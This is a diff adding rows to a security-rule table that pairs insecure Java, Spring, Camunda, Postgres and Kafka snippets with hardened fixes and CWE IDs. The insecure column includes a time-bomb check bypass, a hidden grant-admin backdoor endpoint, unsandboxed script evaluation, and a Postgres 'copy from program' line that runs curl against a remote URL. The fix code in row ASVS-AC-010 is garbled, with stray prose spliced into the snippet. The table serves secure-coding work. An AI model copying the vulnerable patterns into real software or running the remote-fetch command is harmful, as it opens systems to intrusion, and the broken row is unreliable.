+| SPR-098 | Path Traversal in Zip Slip Vulnerability | `File f = new File(outDir, entry.getName());`<br>`FileOutputStream fos = new FileOutputStream(f);` | `String canonicalPath = new File(outDir, entry.getName()).getCanonicalPath();`<br>`if (!canonicalPath.startsWith(outDir.getCanonicalPath())) {`<br>`  throw new SecurityException("Malicious zip entry");`<br>`}` | Archive Security | CWE-22 |
+| SPR-099 | Insecure JMX RMI Remote Code Execution | `LocateRegistry.createRegistry(1099);`<br>`mbsc.createMBean("javax.management.loading.MLet", ...);` | `System.setProperty("com.sun.management.jmxremote.authenticate", "true");`<br>`System.setProperty("com.sun.management.jmxremote.ssl", "true");`<br>`JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:9999/server");` | Java Management | CWE-749 |
+| SPR-100 | Timing Attack in Password/Token Comparison | `if (inputToken.equals(storedToken)) { return true; }` | `if (MessageDigest.isEqual(inputToken.getBytes(), storedToken.getBytes())) { return true; }` | Crypto Side-channel | CWE-208 |
+| SPR-101 | Exposure of System Environment via Actuator/Env | `management.endpoint.env.show-values=always` | `management.endpoint.env.show-values=when-authorized`<br>`management.endpoint.env.roles=ADMIN` | Info Exposure | CWE-497 |
+| SPR-102 | Logback/Log4j2 Unsafe Lookup Pattern (Log4Shell-style) | `logger.info("Context: " + request.getHeader("X-Context"));` | `logger.info("Context: {}", SafeValidator.clean(request.getHeader("X-Context")));` | Logging Injection | CWE-117 |
+| SPR-103 | Insecure Apache Commons BeanUtils Copy | `BeanUtils.copyProperties(dest, orig);` | `PropertyUtils.copyProperties(dest, orig);`<br>`// Use dedicated mappers like MapStruct with explicit mappings` | Mass Assignment | CWE-915 |
+| CAM-029 | Camunda Script Task Groovy Shell Escape | `execution.setVariable("res", shell.evaluate(userScript));` | `Context ctx = Context.newBuilder("js").allowHostAccess(HostAccess.NONE).build();` | Camunda Sandbox | CWE-94 |
+| CAM-030 | Camunda BPMN Error Code Injection | `throw new BpmnError(request.getErrorCode());` | `String code = Set.of("ERR_PAY", "ERR_AUTH").contains(request.getErrorCode()) ? request.getErrorCode() : "ERR_GENERIC";`<br>`throw new BpmnError(code);` | Camunda Logic | CWE-20 |
+| DB-008 | Postgres 16 Unsafe Copy From Command | `copy table from program 'curl http://...';` | `copy table from '/tmp/data.csv' with (format csv);` | Persistence | CWE-78 |
+| INF-009 | Missing Resource Quotas in Java Pods (OOM-Killer risk) | `resources: {}`<br>`limits: {}` | `resources:`<br>`  requests: { cpu: "250m", memory: "512Mi" }`<br>`  limits: { cpu: "1", memory: "1Gi" }`<br>`livenessProbe:`<br>`  httpGet: { path: /actuator/health/liveness, port: 8080 }` | Kubernetes Runtime Stability | CWE-400 |
+| ASVS-AUTH-001 | Missing Credential Stuffing Protection on Login | `@PostMapping("/login")`<br>`authService.login(req.username(), req.password());` | `RateLimitKey k = RateLimitKey.of(req.username(), clientIp(request));`<br>`if (!authRateLimiter.tryConsume(k)) throw new TooManyRequestsException();`<br>`authService.login(req.username(), req.password());` | ASVS V2 - Authentication | CWE-307 |
+| ASVS-AUTH-002 | MFA Challenge Can Be Bypassed on Alternate Route | `if (passwordOk) return issueToken(user);`<br>`// mfa checked only in /mfa/verify endpoint` | `if (!mfaPolicy.isSatisfied(user, request)) throw new AccessDeniedException("mfa required");`<br>`return issueToken(user);` | ASVS V2 - Authentication | CWE-287 |
+| ASVS-AUTH-003 | No Detection of Automated Login Bursts | `loginAttemptsRepo.save(new Attempt(user));`<br>`return auth.login(user, pass);` | `if (riskEngine.isCredentialStuffing(user, clientIp(request), ua(request)))`<br>`  throw new AccessDeniedException("step-up required");`<br>`return auth.login(user, pass);` | ASVS V2 - Authentication | CWE-307 |
+| ASVS-AUTH-004 | MFA Recovery Flow Lacks Step-up Verification | `@PostMapping("/mfa/recovery")`<br>`service.recover(userId, code);` | `@PostMapping("/mfa/recovery")`<br>`requireRecentReauth(userId);`<br>`requireOutOfBandApproval(userId);`<br>`service.recover(userId, code);` | ASVS V2 - Authentication | CWE-287 |
+| ASVS-AUTH-005 | Password Reset Token is Reusable | `if (tokenRepo.isValid(t)) resetPassword(t, newPass);` | `ResetToken rt = tokenRepo.requireActive(t);`<br>`resetPassword(rt.userId(), newPass);`<br>`tokenRepo.invalidate(rt.id());` | ASVS V2 - Authentication | CWE-640 |
+| ASVS-AUTH-006 | Weak Password Policy Without Breached Password Check | `if (newPass.length() < 8) throw new IllegalArgumentException();` | `passwordPolicy.validateStrength(newPass);`<br>`if (breachService.isCompromised(newPass)) throw new SecurityException("breached password");` | ASVS V2 - Authentication | CWE-521 |
+| ASVS-AUTH-007 | Password Reset Token TTL Too Long | `token.setExpiresAt(now().plusDays(7));` | `token.setExpiresAt(now().plusMinutes(15));`<br>`token.setOneTime(true);`<br>`token.setBoundIp(clientIp(request));` | ASVS V2 - Authentication | CWE-613 |
+| ASVS-AUTH-008 | Missing Account Lockout/Backoff on Failed Auth | `if (!auth.ok(user, pass)) return unauthorized();` | `if (!auth.ok(user, pass)) {`<br>`  lockoutPolicy.registerFailure(user, clientIp(request));`<br>`  lockoutPolicy.enforce(user);`<br>`  return unauthorized();`<br>`}` | ASVS V2 - Authentication | CWE-307 |
+| ASVS-AUTH-009 | Authentication Events Not Audited for Abuse Detection | `auth.login(user, pass);` | `AuthResult r = auth.login(user, pass);`<br>`securityAudit.logAuthEvent(user, r.status(), clientIp(request), ua(request));` | ASVS V2 - Authentication | CWE-778 |
+| ASVS-AUTH-010 | Password Reset Endpoint Missing User Enumeration Protection | `if (!userRepo.exists(email)) return 404;` | `passwordResetService.request(email);`<br>`return ResponseEntity.accepted().body("If account exists, instructions were sent.");` | ASVS V2 - Authentication | CWE-203 |
+| ASVS-SESS-001 | Session ID Not Rotated After Authentication | `session.setAttribute("uid", user.id());` | `request.changeSessionId();`<br>`session.setAttribute("uid", user.id());` | ASVS V3 - Session Management | CWE-384 |
+| ASVS-SESS-002 | Session Fixation Across HTTP to HTTPS Transition | `if (isHttp(request)) redirectToHttps(request);` | `if (isHttp(request)) { redirectToHttps(request); return; }`<br>`request.changeSessionId();` | ASVS V3 - Session Management | CWE-384 |
+| ASVS-SESS-003 | No Concurrent Session Limit Enforcement | `sessionRegistry.register(userId, sessionId);` | `sessionRegistry.revokeExcess(userId, 3);`<br>`sessionRegistry.register(userId, sessionId);` | ASVS V3 - Session Management | CWE-613 |
+| ASVS-SESS-004 | Logout Does Not Revoke Refresh Tokens | `SecurityContextHolder.clearContext();` | `tokenService.revokeAll(userId, sessionId);`<br>`SecurityContextHolder.clearContext();` | ASVS V3 - Session Management | CWE-613 |
+| ASVS-SESS-005 | Missing Absolute Session Lifetime | `session.setMaxInactiveInterval(30 * 60);` | `session.setMaxInactiveInterval(15 * 60);`<br>`sessionService.enforceAbsoluteLifetime(sessionId, Duration.ofHours(8));` | ASVS V3 - Session Management | CWE-613 |
+| ASVS-SESS-006 | Session Context Drift Not Verified | `if (isAuthenticated()) return next();` | `if (!sessionBinding.matches(sessionId, deviceFingerprint(request))) forceReauth();`<br>`return next();` | ASVS V3 - Session Management | CWE-384 |
+| ASVS-SESS-007 | Stateless Token Flow Lacks Revocation Versioning | `Jwt jwt = decoder.decode(token);` | `Jwt jwt = decoder.decode(token);`<br>`if (!tokenVersionService.isCurrent(jwt.getSubject(), jwt.getClaimAsString("ver"))) throw new BadJwtException("revoked");` | ASVS V3 - Session Management | CWE-613 |
+| ASVS-SESS-008 | Admin Sessions Use Same Policy as Regular Users | `sessionPolicy.apply(userRole);` | `sessionPolicy.apply(userRole);`<br>`if (hasRole(userRole, "ADMIN")) adminSessionPolicy.enforce(sessionId);` | ASVS V3 - Session Management | CWE-284 |
+| ASVS-SESS-009 | Missing Session Inventory API for User Self-Revocation | `// no endpoint` | `@GetMapping("/sessions") List<SessionDto> list = sessionRegistry.listForUser(userId);`<br>`@DeleteMapping("/sessions/{id}") sessionRegistry.revoke(userId, id);` | ASVS V3 - Session Management | CWE-613 |
+| ASVS-SESS-010 | CSRF Token Not Bound to Session Context | `CookieCsrfTokenRepository.withHttpOnlyFalse();` | `csrfTokenService.bindToSession(csrfToken, sessionId, userId);`<br>`csrfTokenService.rotateOnPrivilegeChange(sessionId);` | ASVS V3 - Session Management | CWE-352 |
+| ASVS-AC-001 | Administrative Interface Exposure Without Network Guard | `@RequestMapping("/admin/**")`<br>`@PreAuthorize("hasRole('ADMIN')")` | `@RequestMapping("/admin/**")`<br>`networkPolicy.requirePrivateSource(request);`<br>`@PreAuthorize("hasRole('ADMIN')")` | ASVS V4 - Access Control (Logic: strong) | CWE-284 |
+| ASVS-AC-002 | Service-to-Service Least Privilege Drift | `client.callInternal("/billing/admin/reconcile");` | `serviceToken.requireScope("billing:reconcile");`<br>`client.callInternal("/billing/reconcile");` | ASVS V4 - Access Control (Logic: strong) | CWE-250 |
+| ASVS-AC-003 | Policy Enforcement Only in Controller, Missing in Service Layer | `@PreAuthorize("hasRole('ADMIN')")`<br>`public void endpoint(){ service.process(orderId); }` | `@PreAuthorize("hasRole('ADMIN')")`<br>`public void endpoint(){ service.processAuthorized(currentUser(), orderId); }`<br>`// service enforces ownership/tenant checks` | ASVS V4 - Access Control (Logic: strong) | CWE-285 |
+| ASVS-AC-004 | Missing Authorization on Metadata/Control-plane Endpoints | `@GetMapping("/metadata/config") return configService.dump();` | `@PreAuthorize("hasAuthority('meta:read')")`<br>`return configService.safeViewFor(currentPrincipal());` | ASVS V4 - Access Control (Logic: strong) | CWE-200 |
+| ASVS-AC-005 | Async Worker Executes Privileged Action Without Caller Context | `@KafkaListener ... paymentService.refund(orderId);` | `AuthContext ctx = signedContextVerifier.verify(headers);`<br>`authz.require(ctx, "refund:execute", orderId);`<br>`paymentService.refund(orderId);` | ASVS V4 - Access Control (Logic: strong) | CWE-285 |
+| ASVS-AC-006 | Cross-tenant Access via Missing Tenant Predicate in Repository | `repo.findById(id).orElseThrow();` | `repo.findByIdAndTenantId(id, tenantFromAuth()).orElseThrow();` | ASVS V4 - Access Control (Logic: strong) | CWE-639 |
+| ASVS-AC-007 | Delegated Authorization Scope Not Checked for High-risk Action | `if (jwt != null) executeTransfer(req);` | `scopePolicy.require(jwt, "transfer:write");`<br>`executeTransfer(req);` | ASVS V4 - Access Control (Logic: strong) | CWE-285 |
+| ASVS-AC-008 | Approval Workflow Allows Privileged Transition Skipping | `if (req.approved()) state = APPROVED;` | `stateMachine.requireTransition(currentState, req.nextState(), approverRole(currentUser()));`<br>`state = req.nextState();` | ASVS V4 - Access Control (Logic: strong) | CWE-284 |
+| ASVS-AC-009 | Privileged Endpoint Accessible via Alternate Route Alias | `@PostMapping({"/admin/run", "/api/run"})` | `@PostMapping("/admin/run")`<br>`@PreAuthorize("hasRole('ADMIN')")`<br>`// remove public alias` | ASVS V4 - Access Control (Logic: strong) | CWE-285 |
+| ASVS-AC-010 | Missing Deny-by-default Fallback in Permission Evaluator | `return policy.allow(auth, target, perm);` | `if (auth == null |  | target == null | Apply strict allowlist validation, secure framework defaults, and least-privilege access controls. | perm == null) return false;`<br>`return policy.allow(auth, target, perm);` | ASVS V4 - Access Control (Logic: strong) | CWE-284 |
+| ASVS-MAL-001 | Time-Bomb Logic Triggered by Date Window in Production | `if (LocalDate.now().isAfter(LocalDate.parse("2027-01-01"))) disableChecks();` | `featurePolicy.requireSignedFlag("maintenance_mode");`<br>`// remove hardcoded temporal bypass branches` | ASVS V10 - Malicious Code (Logic: strong) | CWE-912 |
+| ASVS-MAL-002 | Hidden/Unused Backdoor Endpoint in Business Service | `@GetMapping("/internal/debug/grantAdmin")`<br>`grantAdmin(uid);` | `// remove endpoint from production build`<br>`@Profile("dev")`<br>`@PreAuthorize("denyAll()")` | ASVS V10 - Malicious Code (Logic: strong) | CWE-912 |
+| ASVS-MAL-003 | Unauthorized Egress in Business Logic Path | `webClient.post().uri(req.callbackUrl()).retrieve();` | `URI u = egressPolicy.allowlisted(req.callbackUrl());`<br>`proxyClient.forwardViaEgressProxy(u, payload);` | ASVS V10 - Malicious Code (Logic: strong) | CWE-918 |
+| ASVS-MAL-004 | Dynamic Script Execution in Rule Evaluation | `Object out = shell.evaluate(userScript);` | `Decision decision = decisionEngine.evaluateAllowlisted(ruleKey, context);` | ASVS V10 - Malicious Code (Logic: strong) | CWE-94 |
+| ASVS-MAL-005 | Covert Feature Flag Enables Privilege Bypass | `if (flags.isEnabled("skip_auth")) return success();` | `if (flags.isEnabled("skip_auth")) throw new SecurityException("forbidden in prod");`<br>`authz.enforce(request);` | ASVS V10 - Malicious Code (Logic: strong) | CWE-285 |
+| ASVS-MAL-006 | Shadow Queue/Topic Used for Unverified Commands | `kafkaTemplate.send(req.topic(), req.payload());` | `String topic = topicPolicy.requireAllowed(req.topic());`<br>`kafkaTemplate.send(topic, signedPayload(req.payload()));` | ASVS V10 - Malicious Code (Logic: strong) | CWE-441 |
+| ASVS-MAL-007 | Approval Chain Bypass via Direct State Mutation | `order.setStatus(APPROVED); repo.save(order);` | `workflowService.advance(orderId, "APPROVE", currentUser());`<br>`// enforce signed transition history` | ASVS V10 - Malicious Code (Logic: strong) | CWE-841 |
+| ASVS-MAL-008 | Fraud-prone Monetary Operation Without Velocity Guard | `transferService.execute(req);` | `velocityGuard.enforce("transfer", currentUser(), req.amount());`<br>`transferService.execute(req);` | ASVS V10 - Malicious Code (Logic: strong) | CWE-770 |
+| ASVS-MAL-009 | Integrity Check Missing for Policy Artifact Load | `Policy p = mapper.readValue(raw, Policy.class);` | `policyIntegrity.verifySignature(raw, signature);`<br>`Policy p = mapper.readValue(raw, Policy.class);` | ASVS V10 - Malicious Code (Logic: strong) | CWE-353 |
+| ASVS-MAL-010 | Tampered Business Rule Source Accepted from Untrusted Storage | `String rule = s3.getObject(bucket, key);`<br>`engine.load(rule);` | `SignedBlob b = artifactStore.getSigned(key);`<br>`integrity.requireTrustedPublisher(b);`<br>`engine.load(b.payload());` | ASVS V10 - Malicious Code (Logic: strong) | CWE-494 |
+| ASVS-CONF-001 | Build Pipeline Accepts Unsigned Artifacts | `mvn deploy -DskipTests` | `ciPolicy.requireArtifactSignature();`<br>`ciPolicy.requireProvenanceAttestation();` | ASVS V14 - Configuration | CWE-353 |
+| ASVS-CONF-002 | Dependency Versions Not Pinned in Build Config | `<version>[1.0,)</version>` | `<version>1.4.7</version>`<br>`mvn -Psecurity verify -Ddependency.lock=true` | ASVS V14 - Configuration | CWE-1104 |
+| ASVS-CONF-003 | SCA Critical Findings Do Not Fail CI | `sca.scan(); // advisory only` | `sca.scan();`<br>`if (sca.hasCritical()) throw new IllegalStateException("critical vulnerabilities found");` | ASVS V14 - Configuration | CWE-1104 |
+| ASVS-CONF-004 | Insecure Default Environment Variables in Production | `FEATURE_INSECURE_DEBUG=true` | `FEATURE_INSECURE_DEBUG=false`<br>`startupPolicy.rejectIf("FEATURE_INSECURE_DEBUG", "true");` | ASVS V14 - Configuration | CWE-16 |
+| ASVS-CONF-005 | Debug/Trace Endpoints Enabled in Production Profile | `management.endpoints.web.exposure.include=*` | `management.endpoints.web.exposure.include=health,info,prometheus`<br>`management.endpoint.shutdown.enabled=false` | ASVS V14 - Configuration | CWE-16 |
+| ASVS-CONF-006 | Secrets Passed via Plain Environment Variables Without Guard | `DB_PASSWORD=${DB_PASSWORD}` | `DB_PASSWORD_FILE=/var/run/secrets/db_password`<br>`secretLoader.requireMountedSecret("db_password");` | ASVS V14 - Configuration | CWE-798 |
+| ASVS-CONF-007 | TLS/mTLS Downgrade Allowed by Runtime Flag | `if (env("ALLOW_PLAINTEXT").equals("true")) useHttp();` | `transportPolicy.enforceTlsOnly();`<br>`if (isProd()) requireMutualTls();` | ASVS V14 - Configuration | CWE-319 |
+| ASVS-CONF-008 | Config Source Trust Not Restricted | `config.import=optional:configserver:` | `config.import=configserver:`<br>`configTrust.requireSignedCommits();`<br>`configTrust.requireAllowedRepo("git@example/sec-config.git");` | ASVS V14 - Configuration | CWE-345 |
+| ASVS-CONF-009 | Container Runtime Hardening Not Enforced by Policy | `securityContext: {}` | `securityContext:`<br>`  runAsNonRoot: true`<br>`  allowPrivilegeEscalation: false`<br>`  readOnlyRootFilesystem: true`<br>`  capabilities: { drop: ["ALL"] }` | ASVS V14 - Configuration | CWE-250 |
+| ASVS-CONF-010 | Egress/Proxy Controls Not Mandatory in Deployment Config | `OUTBOUND_DIRECT=true` | `OUTBOUND_DIRECT=false`<br>`HTTP_PROXY=http://egress-proxy:3128`<br>`startupPolicy.requireProxyForExternalCalls();` | ASVS V14 - Configuration | CWE-16 |
+| ASVS-VAL-001 | Deny-list Validation Instead of Strict Allow-list | `if (input.contains("../")) reject();` | `if (!input.matches("^[A-Za-z0-9._-]{1,64}$")) throw new IllegalArgumentException("invalid");` | ASVS V5 - Validation | CWE-20 |
+| ASVS-VAL-002 | Regex Catastrophic Backtracking in Input Filter | `Pattern.compile("(a+)+$").matcher(input).matches();` | `Pattern p = Pattern.compile("^[a-zA-Z0-9_-]{1,64}$");`<br>`if (!p.matcher(input).matches()) reject();` | ASVS V5 - Validation | CWE-1333 |
+| ASVS-VAL-003 | Type Confusion from Generic Map Request Body | `Map<String,Object> body = read(); int amount=(int)body.get("amount");` | `record TransferReq(@Positive BigDecimal amount,@NotBlank String accountId){}`<br>`@Valid TransferReq req = parse();` | ASVS V5 - Validation | CWE-20 |
+| ASVS-VAL-004 | Missing Numeric Range Checks in Business Input | `service.transfer(req.amount());` | `if (req.amount().compareTo(MAX_TRANSFER) > 0) throw new SecurityException("limit");`<br>`service.transfer(req.amount());` | ASVS V5 - Validation | CWE-20 |
+| ASVS-VAL-005 | Unvalidated Enum-like Action Parameter | `switch(req.get("action")) { ... }` | `Action a = Action.valueOf(req.get("action"));`<br>`if (!ALLOWED.contains(a)) throw new SecurityException("bad action");` | ASVS V5 - Validation | CWE-20 |
+| ASVS-VAL-006 | Unicode Normalization Bypass in Username Validation | `if (username.matches("^[a-z0-9_]{3,30}$")) ...` | `String n = java.text.Normalizer.normalize(username, java.text.Normalizer.Form.NFKC);`<br>`if (!n.matches("^[a-z0-9_]{3,30}$")) reject();` | ASVS V5 - Validation | CWE-176 |
+| ASVS-VAL-007 | Missing Canonicalization Before Path Validation | `if (path.startsWith("/uploads/")) read(path);` | `Path p = base.resolve(path).normalize();`<br>`if (!p.startsWith(base)) throw new SecurityException("traversal");` | ASVS V5 - Validation | CWE-22 |
+| ASVS-VAL-008 | Dangerous Boolean Parsing from Untrusted String | `if ("true".equals(req.admin())) grantAdmin();` | `if (!"false".equals(req.admin())) throw new SecurityException("invalid flag");` | ASVS V5 - Validation | CWE-20 |
+| ASVS-VAL-009 | Weak Email Validation Allows Header Injection Payloads | `if (email.contains("@")) send(email);` | `if (!email.matches("^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\\\.[A-Za-z]{2,}$")) reject();` | ASVS V5 - Validation | CWE-93 |
+| ASVS-VAL-010 | Missing Validation on Collection Size Leads to Abuse | `service.process(req.items());` | `if (req.items().size() > 1000) throw new SecurityException("too many items");`<br>`service.process(req.items());` | ASVS V5 - Validation | CWE-770 |
+| ASVS-LOG-001 | Logging Full User Object Including Secret Fields | `log.info("user={}", user);` | `log.info("userId={}, roles={}", user.getId(), user.getRoles());` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-002 | Authorization Header Logged in Access Filter | `log.debug("Authorization={}", req.getHeader("Authorization"));` | `log.debug("auth_scheme={}", scheme(req.getHeader("Authorization")));` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-003 | Password Value Included in Authentication Failure Log | `log.warn("login failed user={} pass={}", u,p);` | `log.warn("login failed user={} reason={}", u, reason);` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-004 | PII Dumped in Exception Stack Context | `log.error("request={}", objectMapper.writeValueAsString(req), ex);` | `log.error("requestId={} failed", req.id(), ex);`<br>`audit.logRedactionApplied(req.id());` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-005 | Tokenized Data Replaced with Raw Values in Debug Mode | `if(debug) log.info("pan={}", pan);` | `log.info("pan_token={}", tokenizedPan);`<br>`assert !isProdDebug();` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-006 | Session IDs Logged in Plain Text | `log.info("sid={}", session.getId());` | `log.info("sid_hash={}", hash(session.getId()));` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-007 | Log Forging via Unescaped User Input | `log.warn("bad value="+input);` | `log.warn("bad value={}", input.replaceAll("[\\\\r\\\\n\\\\t]","_"));` | ASVS V7 - Logging | CWE-117 |
+| ASVS-LOG-008 | Structured Logs Include Secret Environment Variables | `log.info("cfg={}", System.getenv());` | `log.info("cfg_keys={}", allowlistedEnvKeys());` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-009 | Trace Tags Contain Email/SSN | `span.tag("email", user.email());` | `span.tag("user_id", user.id());`<br>`span.tag("pii.redacted","true");` | ASVS V7 - Logging | CWE-532 |
+| ASVS-LOG-010 | Audit Trail Omits Actor/Resource Context | `audit.log("delete success");` | `audit.log("delete", actorId, resourceId, decision, reason);` | ASVS V7 - Logging | CWE-778 |
+| ASVS-FILE-001 | Path Traversal via User-controlled Filename | `new File(baseDir, req.fileName());` | `Path p = baseDir.toPath().resolve(req.fileName()).normalize();`<br>`if (!p.startsWith(baseDir.toPath())) throw new SecurityException();` | ASVS V12 - File Handling | CWE-22 |
+| ASVS-FILE-002 | Zip Slip During Archive Extraction | `File out = new File(dest, entry.getName());` | `Path out = dest.toPath().resolve(entry.getName()).normalize();`<br>`if (!out.startsWith(dest.toPath())) throw new SecurityException("zip slip");` | ASVS V12 - File Handling | CWE-22 |
+| ASVS-FILE-003 | Insecure World-writable Upload Directory Permissions | `Files.createDirectories(uploadDir);` | `Files.createDirectories(uploadDir, PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwxr-x---")));` | ASVS V12 - File Handling | CWE-732 |
+| ASVS-FILE-004 | Unsafe Temporary File Creation in Shared Directory | `File.createTempFile("up","tmp", new File("/tmp"));` | `Path tmp = Files.createTempFile(secureDir, "up", ".tmp");`<br>`Files.setPosixFilePermissions(tmp, PosixFilePermissions.fromString("rw-------"));` | ASVS V12 - File Handling | CWE-377 |
+| ASVS-FILE-005 | Missing File Type Verification on Upload | `storage.save(file.getBytes());` | `if (!allowlistedMime(file.getContentType())) throw new SecurityException();`<br>`storage.save(file.getBytes());` | ASVS V12 - File Handling | CWE-434 |
+| ASVS-FILE-006 | Unbounded File Upload Size | `byte[] b = file.getBytes();` | `if (file.getSize() > MAX_UPLOAD_BYTES) throw new SecurityException("too large");` | ASVS V12 - File Handling | CWE-400 |
+| ASVS-FILE-007 | Direct Download by Relative Path Parameter | `return Files.readAllBytes(Paths.get(req.path()));` | `Path p = base.resolve(req.path()).normalize();`<br>`if (!p.startsWith(base)) throw new SecurityException();`<br>`return Files.readAllBytes(p);` | ASVS V12 - File Handling | CWE-22 |
+| ASVS-FILE-008 | Executable File Permissions Granted to User Upload | `Files.setPosixFilePermissions(path, PosixFilePermissions.fromString("rwxrwxrwx"));` | `Files.setPosixFilePermissions(path, PosixFilePermissions.fromString("rw-r-----"));` | ASVS V12 - File Handling | CWE-732 |
+| ASVS-FILE-009 | Symlink Following in Sensitive File Operations | `Files.copy(src, target, REPLACE_EXISTING);` | `if (Files.isSymbolicLink(src)) throw new SecurityException("symlink");`<br>`Files.copy(src, target, StandardCopyOption.COPY_ATTRIBUTES);` | ASVS V12 - File Handling | CWE-59 |
+| ASVS-FILE-010 | File Extension Validation Without Content Signature Check | `if (name.endsWith(".pdf")) accept();` | `if (!magicNumberVerifier.isPdf(file.getBytes())) throw new SecurityException();` | ASVS V12 - File Handling | CWE-434 |
+| ASVS-FILE-011 | Archive Extraction Without Total Size Guard | `while((e=zis.getNextEntry())!=null){ write(e); }` | `long total=0; while((e=zis.getNextEntry())!=null){ total += Math.max(0,e.getSize()); if(total>MAX_TOTAL) throw new SecurityException(); write(e); }` | ASVS V12 - File Handling | CWE-409 |
+| ASVS-FILE-012 | File Metadata Leakage in Download Response | `resp.setHeader("X-Path", file.getAbsolutePath());` | `resp.setHeader("Content-Disposition","attachment; filename=\"download.bin\"");` | ASVS V12 - File Handling | CWE-200 |
+| ASVS-FILE-013 | Unsafe Parsing of User-supplied XML File | `DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(file);` | `DocumentBuilderFactory f=DocumentBuilderFactory.newInstance();`<br>`f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`<br>`f.newDocumentBuilder().parse(file);` | ASVS V12 - File Handling | CWE-611 |
+| ASVS-FILE-014 | No Antivirus or Content Scanning Hook for Uploads | `fileStore.save(file);` | `scanService.requireClean(file);`<br>`fileStore.save(file);` | ASVS V12 - File Handling | CWE-434 |
+| ASVS-FILE-015 | Unsafe Cleanup Deletes Arbitrary Path | `Files.delete(Paths.get(req.path()));` | `Path p = cleanupBase.resolve(req.path()).normalize();`<br>`if (!p.startsWith(cleanupBase)) throw new SecurityException();`<br>`Files.delete(p);` | ASVS V12 - File Handling | CWE-22 |
+| ASVS-API-001 | Missing X-Content-Type-Options Header | `return chain.doFilter(req,res);` | `res.setHeader("X-Content-Type-Options","nosniff");`<br>`chain.doFilter(req,res);` | ASVS V13 - API/Web | CWE-693 |
+| ASVS-API-002 | Missing Content-Security-Policy Header | `res.setHeader("X-Frame-Options","DENY");` | `res.setHeader("Content-Security-Policy","default-src 'self'");`<br>`res.setHeader("X-Frame-Options","DENY");` | ASVS V13 - API/Web | CWE-693 |
+| ASVS-API-003 | Unsafe HTTP TRACE Method Enabled | `@RequestMapping(method={RequestMethod.GET,RequestMethod.POST,RequestMethod.TRACE})` | `@RequestMapping(method={RequestMethod.GET,RequestMethod.POST})`<br>`// disable TRACE at gateway/server` | ASVS V13 - API/Web | CWE-16 |
+| ASVS-API-004 | Insecure CORS Wildcard with Credentials | `cors.allowedOrigins("*"); cors.allowCredentials(true);` | `cors.allowedOrigins("https://app.example");`<br>`cors.allowCredentials(true);` | ASVS V13 - API/Web | CWE-942 |
+| ASVS-API-005 | Missing Strict-Transport-Security Header | `res.setHeader("Cache-Control","no-store");` | `res.setHeader("Strict-Transport-Security","max-age=31536000; includeSubDomains");` | ASVS V13 - API/Web | CWE-319 |
+| ASVS-API-006 | Missing Referrer-Policy Header | `chain.doFilter(req,res);` | `res.setHeader("Referrer-Policy","no-referrer");`<br>`chain.doFilter(req,res);` | ASVS V13 - API/Web | CWE-200 |
+| ASVS-API-007 | Missing Permissions-Policy Header | `chain.doFilter(req,res);` | `res.setHeader("Permissions-Policy","camera=(), microphone=(), geolocation=()");`<br>`chain.doFilter(req,res);` | ASVS V13 - API/Web | CWE-16 |
+| ASVS-API-008 | Unsafe HTTP Method Override via Header | `if(req.getHeader("X-HTTP-Method-Override")!=null) method=req.getHeader("X-HTTP-Method-Override");` | `if (req.getHeader("X-HTTP-Method-Override") != null) throw new SecurityException("method override disabled");` | ASVS V13 - API/Web | CWE-749 |
+| ASVS-API-009 | Missing Frame-Ancestors Control | `res.setHeader("X-Content-Type-Options","nosniff");` | `res.setHeader("Content-Security-Policy","frame-ancestors 'none'; default-src 'self'");` | ASVS V13 - API/Web | CWE-1021 |
+| ASVS-API-010 | API Supports DELETE Without Authorization Guard | `@DeleteMapping("/v1/admin/cache")`<br>`cache.clear();` | `@PreAuthorize("hasRole('ADMIN')")`<br>`@DeleteMapping("/v1/admin/cache")`<br>`cache.clear();` | ASVS V13 - API/Web | CWE-285 |
+| ASVS-API-011 | Missing Cache-Control on Sensitive API Response | `return ResponseEntity.ok(profile);` | `return ResponseEntity.ok().header("Cache-Control","no-store").body(profile);` | ASVS V13 - API/Web | CWE-525 |
+| ASVS-API-012 | API Accepts GET for State-changing Operation | `@GetMapping("/payments/confirm/{id}")`<br>`service.confirm(id);` | `@PostMapping("/payments/{id}/confirm")`<br>`service.confirm(id);` | ASVS V13 - API/Web | CWE-352 |
+| ASVS-API-013 | Missing Security Headers in Error Responses | `return ResponseEntity.status(500).body(error);` | `return ResponseEntity.status(500).header("X-Content-Type-Options","nosniff").header("Content-Security-Policy","default-src 'none'").body(error);` | ASVS V13 - API/Web | CWE-209 |
+| ASVS-API-014 | Swagger/OpenAPI Endpoint Exposed in Production | `springdoc.api-docs.enabled=true` | `springdoc.api-docs.enabled=false`<br>`springdoc.swagger-ui.enabled=false` | ASVS V13 - API/Web | CWE-200 |
+| ASVS-API-015 | Missing Method-level Restriction for PATCH Endpoint | `@RequestMapping(value="/users/{id}", method={RequestMethod.GET,RequestMethod.POST,RequestMethod.PATCH})` | `@PatchMapping("/users/{id}")`<br>`@PreAuthorize("#id == authentication.principal.userId")` | ASVS V13 - API/Web | CWE-285 |
+| KFK-001 | Kafka client uses PLAINTEXT security protocol | `props.put("security.protocol", "PLAINTEXT");` | `props.put("security.protocol", "SSL");`<br>`props.put("ssl.protocol", "TLSv1.3");` | Kafka - Transport Security | CWE-319 |
+| KFK-002 | Kafka producer missing TLS endpoint identification | `props.put("security.protocol", "SSL");` | `props.put("ssl.endpoint.identification.algorithm", "HTTPS");` | Kafka - TLS Hardening | CWE-319 |
+| KFK-003 | Kafka truststore not configured for SSL client | `new KafkaConsumer<>(props)` | `props.put("ssl.truststore.location", "/etc/ssl/kafka.truststore.jks");`<br>`props.put("ssl.truststore.password", secret("KAFKA_TRUSTSTORE_PASSWORD"));` | Kafka - TLS Hardening | CWE-319 |
